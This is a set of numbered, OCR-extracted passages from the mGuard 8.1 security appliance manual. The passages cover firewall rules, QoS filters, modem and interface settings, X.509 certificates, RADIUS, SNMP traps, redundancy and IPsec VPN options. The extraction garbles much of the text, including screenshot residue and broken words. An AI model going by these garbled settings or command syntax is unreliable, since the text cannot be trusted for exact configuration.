253. he user firewall rules apply can now be selected for the user firewall under Network Security gt gt User Firewall gt gt User Firewall Templates 3 1 2 Dynamic activation of the firewall rules conditional firewall The firewall rules can now be activated via an external event A button on the web interface under Network Security gt gt Packet Filter gt gt Rule Re cords An API command line that is activated using the name or the row ID Packages mguard api_0 mbin action fwrules inJactive lt ROWID gt Packages mguard api_0 mbin action_name fwrules inJactive lt NAME gt An externally connected button switch for mGuards that allow connection see Dynamic activation of the firewall rules conditional firewall on page 27 Establishing or releasing a VPN connection It can be set whether an established VPN connection activates or deactivates the firewall rule Incoming text message for mGuard rs4000 rs2000 3G only See Token for text message trigger under Network Security gt gt Packet Filter gt gt Rule Records CGl interface The nph action cgi may CGI script can be used to control firewall rules If the status of the firewall rule record changes an e mail can automatically be sent With regard to the mGuard rs4000 rs2000 3G a text message can also be sent in this case 105661_en_02 Innominate Security Technologies 27 mGuard 8 1 3 1 3 Function extension of t
254. header the spec ified Ethernet protocol the specified IP protocol the specified TOS DSCP value and or the VLAN ID if VLANs have been set up As the list of filter rules must be applied to each indi vidual data packet it should be kept as short as possible Otherwise the time spent on fil tering could be longer than the time actually saved by setting the filter Please note that not all specified filter criteria should be combined For example it does not make sense to specify an additional IP protocol in the same rule that contains the ARP Ethernet protocol Nor does it make sense to specify a transmitter or sender IP address if the IPX Ethernet protocol is specified in hexadecimal format 12 1 1 Internal External QoS Ingress Filters Internal External Enabling Enable ingress QoS No w Measurement Unit Packets w Filters gt x MEZ minnini Maa inn ee 1 iNo v All wv 0 0 0 0 0 0 0 0 0 0 v 100 unlimited Internal settings for the ingress filter at the LAN interface 105661_en_02 Innominate Security Technologies 293 mGuard 8 1 QoS Ingress Filters Internal External Enabling Enable ingress QoS No w Measurement Unt Packets w Filters p 1 ARP All 1 No w w 0 0 0 0 0 0 0 0 0 0 v 100 unlimited p No w 1 ipv4 Al w 0 0 0 0 0 0 0 0 0 0 All v 1 unlimited External settings for the ingress filter at the WAN interface QoS gt gt Ingress Filters gt gt Internal External Enabl
255. hed via the tele phone network Because the ping tests generate network traffic the number of tests and their frequency should be kept within reasonable limits You should also avoid activating the secondary external interface too early The timeout time for the individual ping re quests is 4 seconds This means that after a ping test is started the next ping test starts after 4 seconds if the previous one was unsuccessful To take these considerations into account make the following settings Probe Interval seconds The ping tests defined above under Probes for activation are performed one after the other When the ping tests defined are performed once in sequence this is known as a fest run Test runs are continuously repeated at intervals The interval entered in this field specifies how long the mGuard waits after starting a test run before it starts the next test run The test runs are not necessarily completed as soon as one ping test in atest run is successful the subsequent ping tests in this test run are omitted If a test run takes longer than the interval specified then the subsequent test run is started directly after it 105661_en_02 Innominate Security Technologies 121 mGuard 8 1 Network gt gt Interfaces gt gt General continued Secondary External Interface continued Number of times all probes need to fail during subsequent runs before the sec ondary external inter face is activated DN
256. his option is set to Built in Modem the PPP dial in option is available In this case the modem connection is not estab lished via the serial socket on the front Instead it is estab lished via the terminal strip on the bottom where the built in modem or ISDN terminal adapter is connected to the tele phone network The connection settings for the built in modem should be made on the Modem Console tab page If the Built in Modem option is used the serial interface can also be used For the options for using the serial interface see Modem Console on page 139 IP address of the mGuard via which it can be accessed for a PPP connection IP address of the partner of the PPP connection Login name that must be specified by the PPP partner in order to access the mGuard via a PPP connection The password that must be specified by the PPP partner in order to access the mGuard via a PPP connection Innominate Security Technologies 137 mGuard 8 1 Network gt gt Interfaces gt gt Dial in Incoming Rules PPP Outgoing Rules PPP Firewall rules for PPP connections to the LAN interface If multiple firewall rules are defined these are queried starting from the top of the list of entries until an appropriate rule is found This rule is then applied If the list of rules con tains further subsequent rules that could also apply these rules are ignored The following options are available Protocol From To IP F
257. hod Aggressive Mode can be selected under IPsec VPN gt gt Connections gt gt Edit gt gt Authentication On the web interface dynamic modifications are highlighted red On the web interface status messages are displayed and permanently updated To recog nize these entries more easily they are displayed in red Detailed logging of modems Only for mGuards that have an internal or external modem or that are capable of mobile communication under Logging gt gt Settings Innominate Security Technologies 29 mGuard 8 1 30 3 2 Overview of modifications in version 8 0 The following functions have been added to firmware Version 8 0 Configuration extensions Improved CIFS Integrity Monitoring see New in CIFS Integrity Monitoring on page 31 Integrated COM server for mGuard platforms with serial interface see COM server for mGuard platforms with serial interface on page 143 Configurable multicast support for devices with internal switch in order to send data to a group of receivers without the transmitter having to send it multiple times see Mul ticast on page 150 VPN extensions see VPN extensions on page 31 Dynamic web interface for configuration Incorrect entries are highlighted in color and help is also offered in the form of system messages see CIDR Classless Inter Do main Routing on page 24 Support for mGuard platforms mGuard rs4000 3G and mGuard rs2000 3G Suppor
258. icates should also have a validity period If the CRL check is activated under Authentication gt gt Certificates gt gt Certificate settings one URL where the corresponding CRL is available must be maintained for each CA cer tificate The URL and CRL must be published before the mGuard uses the CA certificates in order to confirm the validity of the certificates shown by the VPN partners Using X 509 certificates with limited validity periods and CRL checks The use of X 509 certificates is described under Certificate settings on page 195 Authen tication gt gt Certificates gt gt Certificate settings menu If X 509 certificates are used and Check the validity period of certificates and CRLs is set the system time has to be correct We recommend synchronizing the system time using a trusted NTP server Each mGuard in a redundant pair can use the other as an additional NTP server but not as the only NTP server Innominate Security Technologies 355 mGuard 8 1 356 Innominate Security Technologies 105661_en_02 17 Glossary Asymmetrical encryption DES 3DES AES CA certificate 105661_en_02 Glossary In asymmetrical encryption data is encrypted with one key and decrypted with a second key Both keys are suitable for encryption and decryption One of the keys is kept secret by its owner private key while the other is made available to the public public key i e to potential communication par
259. ice load from Blade d failed replaced in this slot Configuration file from Delete configuration Deletes the configuration stored on the controller for the de Blade d not found backup of Blade __ vice in this slot New configuration file for Upload configuration Uploads and saves the configuration profile for this slot on the Blade d saved from client controller Configuration file deletion Download configura Downloads the configuration profile stored on the controller of Blade d failed tion to client for this slot onto the configuration PC Configuration file of Blade d deleted 105661_en_02 Innominate Security Technologies 103 mGuard 8 1 104 Innominate Security Technologies 105661_en_02 Network menu 6 Network menu 105661_en_02 6 1 Network gt gt Interfaces The mGuard has the following interfaces with external access Ethernet in Serial in Built in Serial con ternal LAN terface modem sole via external mGuard rs4000 3G mGuard rs2000 3G m Guard rs4000 rs2000 mGuard centerport mGuard industrial rs mGuard pci mGuard blade mGuard delta mGuard delta EAGLE mGuard mGuard pci SD Yes mGuard pcie SD Optional mGuard industrial rs 1 See Serial console via USB on page 141 The LAN port is connected to a single computer or the local network internal The WAN port is used to connect to the external network For devices with a serial interfa
260. ice with the IP address specified under Destination Multiple ping tests can be configured for different destinations Success failure A ping test is successful if the mGuard receives a positive re sponse to the sent ping request packet within 4 seconds If the response is positive the partner can be reached 120 Innominate Security Technologies 105661_en_02 Network menu Network gt gt Interfaces gt gt General continued Secondary External Interface continued Ping types IKE Ping Determines whether a VPN gateway can be reached at the IP address specified ICMP Ping Determines whether a device can be reached at the IP ad dress specified This is the most common ping test However the re sponse to this ping test is disabled on some devices This means that they do not respond even though they can be reached DNS Ping Determines whether an operational DNS server can be reached at the IP address specified A generic request is sent to the DNS server with the spec ified IP address and every DNS server that can be reached responds to this request Please note the following when programming ping tests It is useful to program multiple ping tests This is because it is possible that an individual tested service is currently undergo ing maintenance This type of scenario should not result in the secondary external interface being activated and an expen sive dial up line connection being establis
261. icted to X 509 client cer tificate when you are sure that this setting works Otherwise your access could be blocked Always take this precautionary measure when modifying settings under User authentication Innominate Security Technologies 63 mGuard 8 1 Management gt gt Web Settings gt gt Access X 509 Subject Enables a filter to be set in relation to the contents of the Sub ject field in the certificate shown by the browser HTTPS client It is then possible to limit or enable access for the browser HTTPS client which the mGuard would accept based on certificate checks Limited access to certain subjects i e individuals and or to subjects that have certain attributes or Access enabled for all subjects see glossary under Sub ject certificate on page 360 a The X 509 Subject field must not be left empty Access enabled for all subjects i e individuals An asterisk inthe X 509 Subject field can be used to specify that all subject entries in the certificate shown by the browser HTTPS client are permitted It is then no longer nec essary to identify or define the subject in the certificate 64 Innominate Security Technologies 105661_en_02 Management menu Management gt gt Web Settings gt gt Access Limited access to certain subjects i e individuals and or to subjects that have certain attributes In the certificate the certificate owner is specified in the
262. iding this signature the CA confirms that the authorized certifi cate owner possesses a private key that corresponds to the public key in the certificate The name of the certificate issuer appears under Issuer on the certificate while the name of the certificate owner appears under Subject A self signed certificate is one that is signed by the certificate owner and not by a CA In self signed certificates the name of the certificate owner appears under both Issuer and Sub ject Self signed certificates are used if communication partners want to or must use the X 509 authentication method without having or using an official certificate This type of authentica tion should only be used between communication partners that know and trust each other Otherwise from a security point of view such certificates are as worthless as for example a home made passport without the official stamp Certificates are shown to all communication partners users or machines during the con nection process providing the X 509 authentication method is used In terms of the mGuard this could apply to the following applications Authentication of communication partners when establishing VPN connections see IPsec VPN gt gt Connections on page 254 Authentication on page 269 Management of the mGuard via SSH shell access see Management gt gt System Set tings gt gt Host on page 33 Shell Access on page 40
263. idual firewall rule you can specify whether the use of the rule Should be logged set Log to Yes Should not be logged set Log to No default settings When set to Yes all connection attempts that are not covered by the rules defined above are logged Default settings No External 2 and Any External are only for devices with a serial interface see Network gt gt Interfaces on page 105 Innominate Security Technologies 207 mGuard 8 1 8 1 2 Outgoing rules Network Security Packet Filter Incoming Rules Outgoing Rules DMZ Rule Records MAC Filtering Advanced Outgoing General firewall setting Use the firewall ruleset below w Log ID fw outgoing M 3391ddd7 f26e 1220 250e 000cbe00052ee PES n Protocoi rromi romeo JOO or O OOO rorot O Action Comment Loo any any No p E 4 A v 0 0 0 0 0 0 0 0 0 0 Accept v default rule p 2 TCP 0 0 0 0 0 any 0 0 0 0 0 any Accept w Yes v UDP These rules ICMP ich traffic from the inside is allowed to pass to the outside Please note GRE s are only meaningful for TCP and UDP All Log entries for unknown connection attempts No v Network Security gt gt Packet Filter gt gt Outgoing Rules Outgoing Lists the firewall rules that have been set up They apply for outgoing data links that have been initiated internally in order to communicate with a remote partner Default setting a rule is defined by default that allows all ou
264. ier w Network gt gt Interfaces gt gt Modem Console for the mGuard industrial rs with built in modem External Modem As for the mGuard rs4000 3G mGuard industrial rs without built in modem mGuard delta mGuard centerport mGuard blade mGuard delta EAGLE mGuard Configuration as above for External Modem see External Modem on page 141 Built in Modem analog Country Extension line regarding dial tone Speaker volume built in speaker Speaker control built in speaker 146 Innominate Security Technologies The country where the mGuard with built in modem is oper ated must be specified here This ensures that the built in modem operates according to the applicable remote access guidelines in the respective country and that it recognizes and uses dial tones correctly for example Yes No When set to No the mGuard waits for the dial tone when the telephone network is accessed and the mGuard is calling the partner When set to Yes the mGuard does not wait for a dial tone In stead it begins dialing the partner immediately This procedure may be necessary if the built in modem of the mGuard is con nected to a private branch exchange that does not emit a dial tone when it is picked up When a specific number must be dialed to access an external line e g 0 this number should be added to the start of the desired partner phone number that is to be dialed These two settings specify
265. ies Otherwise the ISDN protocol should be specified according to the country If necessary this must be requested from the rel evant phone company Layer 2 protocol The set of rules used by the ISDN terminal adapter of the local mGuard to communicate with its ISDN partner This generally is the ISDN modem of the Internet service provider used to es tablish the connection to the Internet It must be requested from the Internet service provider PPP ML PPP is often used 105661_en_02 Innominate Security Technologies 147 m Guard 8 1 6 2 Network gt gt Ethernet Only available with the mGuard rs4000 3G 6 2 1 MAU settings MAU settings Multicast Ethernet Port Mirroring Port Mirroring Receiver Port Mirroring Disabled w MAU Configuration Eer e a aa a a WAN 10 100 BASE T RJ45 Yes 100 Mbit s FDX Unused Yes w LAN1 10 100 BASE T RJ45 Yes v 100 Mbit s FDX 100 Mbit s FDX Yes v none No v LAN2 10 100 BASE T RJ45 Yes v 100 Mbit s FDX Down Yes v none No v LAN3 10 100 BASE T RJ45 Yes v 100 Mbit s FDX Down Yes v none No v LAN4 10 100 BASE T RJ45 Yes v 100 Mbit s FDX Down Yes w none No DMZ 10 100 BASE T RJ45 Yes v 100 Mbit s FDX Unused Yes v No v Address Resolution Table Update Interval 10s LAN1 3c 97 0e 14 be 0e Port Statistics Update Interval Ss 2381393 0 3173900 LAN2 0 0 0 0 LAN3 0 0 0 0 LAN4 0 0 0 0 DMZ 0 0 0 0 Network gt gt Ethernet gt gt MAU settings Port Mirroring Port Mirrorin
266. ies 105661_en_02 Network menu 6 1 4 Modem Console Only mGuard rs4000 3G mGuard rs2000 3G only console mGuard rs4000 rs2000 mGuard centerport mGuard industrial rs mGuard smart mGuard delta not mGuard smart mGuard pci SD mGuard blade mGuard delta EAGLE mGuarda Primary external interface This menu item is not included in the scope of functions for the mGuard rs2000 3G mGuard rs2000 Secondary external inter face This menuitem is not included in the scope of functions for the mGuard rs2000 3G mGuard rs2000 For dialing in to the LAN or for configuration purpos eS This menu item is not included in the scope of functions for the mGuard rs2000 3G mGuard rs2000 105661_en_02 Some mGuard models have a serial interface that can be accessed externally while the mGuard industrial rs is also available with a built in modem as an option see Network gt gt Interfaces on page 105 General Dial out Dial in Modem Console Serial Console Baudrate 57600 Hardware handshake RTS CTS Off w Please note On some platforms the serial port is not accessible The settings above become effective only for administrative shell login via a console connected to the serial port Such logins are impossible if dial in or dial out is configured via external modem External Modem Hardware handshake RTS CTS Off w Baudrate 57600 Handle modem transparently for distin only C 7 Modem in
267. if the other mGuard fails becomes_active the mGuard is becoming active because the other mGuard has failed active the mGuard is active becomes_standby the mGuard is switching from the active state to standby mode The state is changed to outdated since the status database has to be updated first Relates to the status of the availability check for the internal or external interface The availability check has three possible results Presence notifications CARP are not received from any other mGuard device Another mGuard is available which is to become or re main active Another mGuard is available which is active but is to go on_standby Indicates whether the check was successful Each interface is checked separately When synchronizing the state various databases are checked to see whether everything is up to date With one re dundant pair only one database is active while the other is on standby Any change made to this state is also displayed The Connection Tracking Table relates to the firewall state database IPsec VPN Connections with activated VPN redundan cy All virtual interfaces are checked together to see whether the forwarding of packets is allowed 105661_en_02 Redundancy menu Redundancy gt gt FW Redundancy Status gt gt Redundancy Status State History 105661_en_02 Firmware status System time Timeout of the previous state Availability che
268. if you are an experi enced user as doing so could result in all access to the mGuard being blocked When setting up a RADIUS authentication for the first time se lect Yes If you do intend to use the As only method for password au thentication option when setting up RADIUS authentication we recommend that you create a Customized Default Profile which resets the authentication method If you have selected RADIUS authentication as the only method for checking the password it may no longer be possi ble to access the mGuard For example this may be the case if you set up the wrong RADIUS server or convert the mGuard The predefined users root admin netadmin audit and user are then no longer accepted External 2 and Dial in are only for devices with a serial interface see Network gt gt Interfaces on page 105 105661_en_02 Management menu Management gt gt Web Settings gt gt Access User authentication User authentication This menu item is not included User authentication method Login with X 509 client certificate or password w Le NONI x the mGuard rs2000 3G p VPN RootCA01 v mGuard rs2000 xX p root v X p Battaglia Mauro v root v Defines how the local mGuard User authentication Login with password authenticates the remote method Specifies that the remote mGuard user must use a password to log into the mGuard The password is specified under the Authentication gt gt Administ
269. ificate An X 509 v3 certificate thus consists of a public key information about the key owner the Distinguished Name DN authorized use etc and the signature of the CA Subject certificate The signature is created as follows the CA creates an individual bitstring from the bit string of the public key owner information and other data This bitstring can be up to 160 bits in length and is known as the HASH value The CA then encrypts this with its own private key and then adds it to the certificate The encryption with the CA s private key proves the au thenticity of the certificate i e the encrypted HASH string is the CA s digital signature If the certificate data is tampered with then this HASH value will no longer be correct and the certificate will be rendered worthless The HASH value is also known as the fingerprint Since it is encrypted with the CA s private key anyone who has the corresponding public key can decrypt the bitstring and thus verify the authenticity of the fingerprint or signature The involvement of a certification authority means that it is not necessary for key owners to know each other They only need to know the certification authority involved in the process The additional key information also simplifies administration of the key X 509 certificates can for example be used for e mail encryption by means of S MIME or IPsec Innominate Security Technologies 363 mGuard 8 1 Protocol tra
270. ilter is case sensitive a Several filters can be set and their sequence is irrelevant Authorized for access All users root admin netadmin audit Additional filter which specifies that the SSH client has to be authorized for a specific administration level in order to gain access When establishing a connection the SSH client shows its cer tificate and also specifies the system user for which the SSH session is to be opened root admin netadmin audit Ac cess is only granted if the entries match those defined here Access for all listed system users is possible when All users is set The netadmin and audit setting options relate to access rights with the mGuard device manager 50 Innominate Security Technologies 105661_en_02 Management gt gt System Settings gt gt Shell Access 105661_en_02 Client certificate Authorized for access as Management menu Configuration is required in the following cases SSH clients each show a self signed certificate SSHclients each show a certificate signed by a CA Filter ing should take place access is only granted to a user whose certificate copy is installed on the mGuard as the remote certificate and is provided to the mGuard in this ta ble as the Client certificate This filter is not subordinate to the Subject filter It resides on the same level and is allocated a logical OR function with the Subject filter The entry in this field defines whi
271. in you must implement this explicitly by means of corresponding firewall rules for example by specifying Drop as an action Action Accept means that the data packets may pass through Reject means that the data packets are sent back and the sender is informed of their rejection In Stealth mode Reject has the same effect as Drop Drop means that the data packets are not permitted to pass through They are discarded which means that the sender is not informed of their whereabouts Comment Freely selectable comment for this rule Log For each individual firewall rule you can specify whether the use of the rule Should be logged set Log to Yes Should not be logged set Log to No default setting 1 External 2 and Dial in are only for devices with a serial interface see Network gt gt Interfaces on page 105 290 Innominate Security Technologies 105661_en_02 SEC Stick menu 11 2 Connections SEC Stick Connections SEC Stick connections SEC Stick connections A body eae i No wv no myCompany SEC Stick gt gt Connections gt gt SEC Stick connections SEC Stick connections List of defined SEC Stick connections Click on the down arrow at the top left of the screen if you want to add a new connection An existing connection can be edited by clicking on Edit Not all of the SEC Stick functions can be configured via the web interface of the mGuard Enabled To use a defined SE
272. in the VPN Local IP for L2TP con If set as shown in the screenshot above the mGuard will in nections form the partner that its address is 10 106 106 1 284 Innominate Security Technologies 105661_en_02 IPsec VPN menu IPsec VPN gt gt L2TP over IPsec gt gt L2TP Server Update Restart Edit Gateway Traffic ID ISAKMP State IPsec State 105661 _en_02 Remote IP range If set as shown in the screenshot above the mGuard will as start end sign the partner an IP address between 10 106 106 2 and 10 106 106 254 Status Displays information about the L2TP status if this connection type has been selected 10 4 IPsec VPN gt gt IPsec Status IPsec VPN IPsec Status Connection a ISAKMP IPsec Name State State Mannheim Leipzig Gateway 172 16 66 48 any MAI0097829633_1 m Traffic 192 168 1 1 32 192 168 254 1 32 C DE O Beispiel Lieferant LEMA CN VPN Endpunkt C DE O Beispiel Lieferant L L CN VPN Endpunkt ID f eSa Kundendienst Maschine 06 Displays information about the status of IPsec connections The names of the VPN connections are listed on the left while their current status is indi cated on the right Buttons To update the displayed data if necessary click on Update If you want to disconnect and then restart a connection click on the corresponding Restart button If you want to reconfigure a connection click on the corresponding Edit button Connection ISAKAMP State IPsec State
273. in user then the first filter applies The user is assigned the access rights as defined by this filter This could differ from the access rights assigned to the user in the subse quent filters If remote certificates are configured as filters in the X 509 Certificate table column then these filters have priority over the filter settings here 105661_en_02 Innominate Security Technologies 65 mGuard 8 1 Management gt gt Web Settings gt gt Access 66 Authorized for access as X 509 Certificate Authorized for access as Innominate Security Technologies All users root admin netadmin audit Specifies which user or administrator rights are granted to the remote user For a description of the root admin and user authorization levels see Authentication gt gt Administrative Users on page 181 The netadmin and audit authorization levels relate to access rights with the mGuard device manager Configuration is required in the following cases Remote users each show a self signed certificate Remote users each show a certificate signed by a CA Fil tering should take place access is only granted to a user whose certificate copy is installed on the mGuard as the remote certificate and is provided to the mGuard in this ta ble as the X 509 certificate If used this filter has priority over the Subject filter in the table above The entry in this field defines which remote certificate th
274. informed of their whereabouts Comment Freely selectable comment for this rule Log For each individual firewall rule you can specify whether the use of the rule Should be logged set Log to Yes Should not be logged set Log to No default setting 1 External 2 and Dial in are only for devices with a serial interface see Network gt gt Interfaces on page 105 82 Innominate Security Technologies 105661_en_02 Management menu 4 5 2 Trap Dawes e Te 4 Basic traps SNMP authentication Yes Link UpDown es Cokdstat Yes Admin access 55H HTTPS new DHCP client hi Hardware related traps Chassis power signal relay Yes Agent external config storage temperature f 4 CIFS integrity traps Successful integrity check of a CIFS share Failed integrity check of a CFS share ves Found a suspicious difference on a CIFS share Redundancy traps Status change es Userfirewall traps Userfirewalltraps ves VPN traps IPsec connection status changes es w L2TP connection status changes es w Mobile Network Traps Incoming SMS or voice call and network Supervision Trap destinations x Destination IP Destination Port Destination Name Destination Community F al 192 168 10 10 162 SNMP Blomberg In certain cases the mGuard can send SNMP traps SNMP traps are only sent if the SNMP request is activated The traps correspond to SNMPv1 The trap information f
275. ing Enable Ingress QoS No default this feature is disabled If filter rules are defined they are ignored Yes this feature is enabled Data packets may only pass through and be forwarded to the mGuard for further evaluation and processing if they comply with the filter rules defined be low Filters can be set for the LAN port Internal tab page and the WAN port External tab page Measurement Unit kbps or Packet s Specifies the unit of measurement for the numerical values en tered under Guaranteed and Upper Limit Filter Use VLAN If a VLAN is set up the relevant VLAN ID can be specified to allow the relevant data packets to pass through To do this this option must be set to Yes VLAN ID Specifies that the VLAN data packets that have this VLAN ID may pass through To do this the Use VLAN option must be set to Yes Ethernet Protocol Specifies that only data packets of the specified Ethernet pro tocol may pass through Possible entries ARP IPV4 any Other entries must be in hexadecimal format up to 4 digits The ID of the relevant protocol in the Ethernet header is en tered here It can be found in the publication of the relevant standard IP Protocol All TCP UDP ICMP ESP Specifies that only data packets of the selected IP protocol may pass through When set to All no filtering is applied ac cording to the IP protocol From IP Specifies that only data packets from a specified IP address may pass throug
276. ing VPN connections changing editing the VPN connection or connection group properties and deleting connections IPsec VPN Connections Connections Started Berlin Blomberg Disabled Stopped Started Defining a new VPN connection VPN connection channels e Inthe connections table click on Edit to the right of the unnamed entry under Name e If the unnamed entry cannot be seen open another row in the table Editing a VPN connection VPN connection channels e Click on Edit to the right of the relevant entry URL for starting stopping querying the status of a VPN connection The following URL can be used to start and stop VPN connections or query their connection status independently of their Initial Mode setting https server nph vpn cgi name verbindung amp cmad up downlstatus wget no check certificate https admin mGuard 192 168 1 1 nph vpn cgi 7name Athen amp cmd up The no check certificate option ensures that the HTTPS certificate on the mGuard does not undergo any further checking It may also be necessary to encode the password for the URL if it contains special charac ters A command like this relates to all connection channels that are grouped together under the respective name in this example Athen This is the name that is listed under Psec VPN gt gt Connections gt gt Edit gt gt General as A descriptive name for the connection Inthe event
277. ing the X 509 certificates shown by these VPN partners For this to happen the relevant X 509 certificate must be set on the mGuard This is known as the Remote CA Certificate Ifa remote certificate is renewed for a brief period only one of the mGuard devices will have a new certificate We therefore recommend authenticating the VPN partners using CA cer tificates instead of remote certificates in VPN redundancy 354 Innominate Security Technologies 105661_en_02 105661_en_02 Redundancy Adding a new CA certificate to identify VPN partners The mGuard can be set to authenticate VPN partners using CA certificates see CA Certif icates on page 199 and Authentication on page 269 To do this select Signed by any trusted CA under Psec VPN gt gt Connections gt gt Edit gt gt Authentication Remote CA Certificate With this setting a new CA certificate can be added without affecting the established VPN connections However the new CA certificates are used immediately The X 509 certificate used by the VPN partner to authenticate itself to the mGuard can then be replaced with min imal interruption The only requirement is ensuring that the new CA certificate is available first The mGuard can be set to check the validity period of the certificates provided by the VPN partner see Certificate settings on page 195 In this case new trusted CA certificates must be added to the mGuard configuration These certif
278. innominate com Archived log entries are not affected by a restart They can be downloaded as part of the support snapshot Support gt gt Advanced menu item Snapshot tab page A snapshot provides your dealer s support team with additional options for more efficient trouble shooting than would be possible without archiving Archive diagnostic Only visible if archiving is enabled If only log entries gener messages only upon ated for failed connection attempts are to be archived set this failure Yes No option to Yes If set to No all log entries will be archived Innominate Security Technologies 249 mGuard 8 1 m CC e e e TCP Encapsulation This function is used to encapsulate data packets to be transmitted via a VPN connection in TCP packets Without this encapsulation under certain circumstances it is possible for VPN connections that important data packets belonging to the VPN connection may not be cor rectly transmitted due to interconnected NAT routers firewalls or proxy servers for exam ple Firewalls for example may be set up to prevent any data packets of the UDP protocol from passing through or incorrectly implemented NAT routers may not manage the port num bers correctly for UDP packets TCP encapsulation avoids these problems because the packets belonging to the relevant VPN connection are encapsulated in TCP packets i e they are hidden so that only TCP packets appear for the network infrastructure
279. iod after which membership to the multicast group ex pires in seconds IGMP Query IGMP is used to join and leave a multicast group Here the IGMP version can be selected V1 or V2 V3 is not supported IGMP Query Interval Interval in which IGMP queries are generated in seconds Multicast Groups Displays the multicast groups The display contains all static entries and the dynamic entries which are discovered by IGMP snooping 150 Innominate Security Technologies 105661_en_02 Network menu 6 2 3 Ethernet a Only available with the mGuard rs4000 3G Network Ethernet MAU settings Multicast Ethernet ARP Timeout ARP Timeout 30 MTU Settings MTU of the internal interface 1500 MTU of the internal interface for 1500 VLAN MTU of the externalinterface 1500 MTU of the external interface for 1500 VLAN MTU ofthe DMZ interface 1500 MTU of the Management Interface 1500 MTU of the Management Interface for 1500 VLAN Network gt gt Ethernet gt gt Ethernet ARP Timeout ARP Timeout Service life in seconds of entries in the ARP table MAC and IP addresses are assigned to each other in the ARP table MTU Settings MTU of the interface The maximum transfer unit MTU defines the maximum IP packet length that may be used for the relevant interface For a VLAN interface As VLAN packets contain 4 bytes more than those without VLAN certain drivers may have problems processing these larger packets Such pro
280. ion With passive FTP the client establishes this additional con nection to the server for data transmission FTP must be set to Yes default so that additional connec tions can pass through the firewall IRC Yes No Similar to FTP for IRC chat over the Internet to work properly incoming connections must be allowed following active con nection establishment IRC must be set to Yes default in order for these connections to pass through the firewall 105661_en_02 Innominate Security Technologies 219 mGuard 8 1 Network Security gt gt Packet Filter gt gt Advanced PPTP H 323 SIP OPC classic Sanity check for OPC classic 220 Innominate Security Technologies Yes No default No Must be set to Yes if VPN connections are to be established using PPTP from local computers to external computers with out the assistance of the mGuard Must be set to Yes if GRE packets are to be forwarded from the internal area to the external area Yes No default No Protocol used to establish communication sessions between two or more devices Used for audio visual transmission This protocol is older than SIP Yes No default No SIP Session Initiation Protocol is used to establish communi cation sessions between two or more devices Often used in IP telephony When set to Yes it is possible for the mGuard to track the SIP and add any necessary firewall rules dynamically if further PCP channels are
281. ion attempt is successful Authentication gt gt RADIUS Servers RADIUS servers RADIUS timeout Specifies the time in seconds the mGuard waits for a re Thi sponse from the RADIUS server Default 3 Seconds is menu item is not included in the scope of functions for RADIUS retries Specifies how often requests to the RADIUS server are re the mGuard rs2000 3G peated after the RADIUS timeout time has elapsed Default 3 mGuard rs2000 RADIUS NAS Identifier A NAS ID NAS identifier is sent with every RADIUS request except when the field remains empty All common characters on the keyboard except for umlauts can be used as the NAS ID The NAS ID is a RADIUS attribute that can be used by the cli ent to be identified by the RADIUS server The NAS ID can be used instead of an IP address to identify the client It must be unique within the range of the RADIUS server Server Name of the RADIUS server or its IP address We recommend entering IP addresses as servers instead of names where possible Otherwise the mGuard must first resolve the names before it can send authentication queries to the RADIUS server This takes time when logging in Also it may not always be possible to perform authenti cation if name resolution fails e g because the DNS is not available or the name was deleted from the DNS 188 Innominate Security Technologies 105661_en_02 Authentication menu Authentication gt gt RADIUS Servers
282. ion of the last check Start of the current check Progress of the cur rent check Status Starts at Progress Number of detected deviations Estimated completion time Start an integrity check right now Re Build the integrity database Interrupt the current process 238 Innominate Security Technologies Last check was OK no deviations found Deviations detected during the last check x The exact deviations are listed in the check report The check report is displayed here It can be downloaded by clicking on Download the report Click on Validate the report to check whether the report is unchanged from the definition in the MGUARD according to the signature and certificate Servername networkdrive Weekday month day HH MM SS UTC The local time may differ from this time Example the standard time in Germany is Central European Time CET which is UTC plus one hour Central European Summer Time applies in summer which is UTC plus two hours Duration of the check in hours and minutes Only displayed if a check has been carried out Only displayed if a check has been carried out Only displayed if a check is currently active Status of the integrity check Start time Progress as a percentage and the number of checked files Number of differences detected Estimated completion time for the check Click on Start a check to start the integrity check Only displayed if a
283. ional protection If there are special requirements in your operating environment this value can be increased Connections established from the mGuard are also counted This value must therefore not be set too low as this will other wise cause malfunctions Yes No default No SYN is a special data packet used in TCP IP connection es tablishment that marks the beginning of the connection estab lishment process No default the mGuard also allows connections where the beginning has not been registered This means that the mGuard can perform a restart when a connection is present without interrupting the connection Yes the mGuard must have registered the SYN packet of an existing connection Otherwise the connection is aborted If the mGuard performs a restart while a connection is present this connection is interrupted Attacks on and the hijacking of existing connections are thus prevented If a TCP connection is not used during the time period speci fied here the connection data is deleted A connection translated by NAT not 1 1 NAT must then be reestablished If Yes is set under Allow TCP connections upon SYN only all expired connections must be reestablished The default setting is 4832000 seconds 5 days 105661_en_02 Network Security menu Network Security gt gt Packet Filter gt gt Advanced Timeout for closed The timeout blocks a TCP port to port connection for an ex TCP connectio
284. ions allow you to reduce the sze of the UDP packets generated by IPsec to traverse such routers IKE Fragmentation The IKE Main Mode with X 509 certificates usually generates large UDP packets With this option enabled IKE Main Mode packets will be fragmented within the IKE protocol itself and thereby avoid large UDP packets Yes w IPsec MTU default is 16260 The internal IPsec MTU is usually set to a large value like 16260 to avoid fragmentation of IP packets within IPsec When IPsec has to traverse NAT routers encrypted IP packets will be transfered via UDP By reducing the IPsec MTU the IP packets will be fragmented before they are encapsulated in UDP and thereby avoid large UDP packets A recommended value in such situations is 1414 or smaller 16260 Npte This applies to VPN tunnels only 105661_en_02 Innominate Security Technologies 247 mGuard 8 1 IPsec VPN gt gt Global gt gt Options Options Allow packet forward ing between VPN con nections Archive diagnostic messages for VPN connections The CMD contact is only avail able on the mGuard rs4000 rs2000 mGuard industrial rs This option should only be set to Yes on an mGuard communicating between two different VPN partners a To enable communication between two VPN part ners the local network of the communicating mGuard must be configured so that the remote networks containing the VPN partners are in cluded The opposite setup local and remote net wo
